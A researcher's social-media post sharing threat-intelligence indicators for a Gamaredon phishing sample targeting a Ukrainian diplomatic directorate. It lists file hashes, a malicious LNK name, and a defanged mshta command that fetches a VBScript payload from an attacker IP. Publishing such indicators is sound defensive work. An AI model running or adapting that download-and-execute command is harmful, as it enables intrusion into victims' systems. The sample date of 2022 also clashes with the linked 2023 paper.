FedSearch - Federated network search engine

FedSearch

Dmitry Bestuzhev :verified: · @dimitribest

183 followers · 49 posts · Server infosec.exchange

Open media

A very fresh #Gamaredon TA sample from today (Jan 23, 2022) targeting the Directorate General For Rendering Services To Diplomatic Missions of #Ukraine:

Original email: afb612d08112c036628a29ed8d4bd4550ca7cfed2582e2f432f2283a9b507f15e

Attachment:
d124919de870b5974639ba24dd80709ed890119bdec4ba6a6179464fca4ef952 *Запит.tar

Extracted malicious LNK:
600ef7861ad03b434d98312a4133dc33fa1944f43c2e558044dfcdb342803147 *Відповідно_до_статті_20_Закону,_просимо_надати_відповідь_протягом_5_робочих_днів_з_дня_отримання_запиту.lnk
dropping a next stage #vbscript via #mshta

%windir%\system32\mshta[.]exe http://194.180.174[.]203/23.01/mo/baseball[.]DjVu

284bd873c840415ee24738f0a866b558d51f5f58b6bf29fb2818ffb819f9bd04 *baseball.DjVu

Once deobfuscated it leads to a #Telegram channel providing with the next state IP:
b7422446c22baee16c6c9c00a82610f739b836648ffce070bbd6c932db5416f5 *baseball.DjVu.deobfuscated

We have a full paper of this Telegram multi-staging technique published last week here: https://blogs.blackberry.com/en/2023/01/gamaredon-abuses-telegram-to-target-ukrainian-organizations

#gamaredon #ukraine #vbscript #mshta #telegram

Last updated 2 years ago

Original post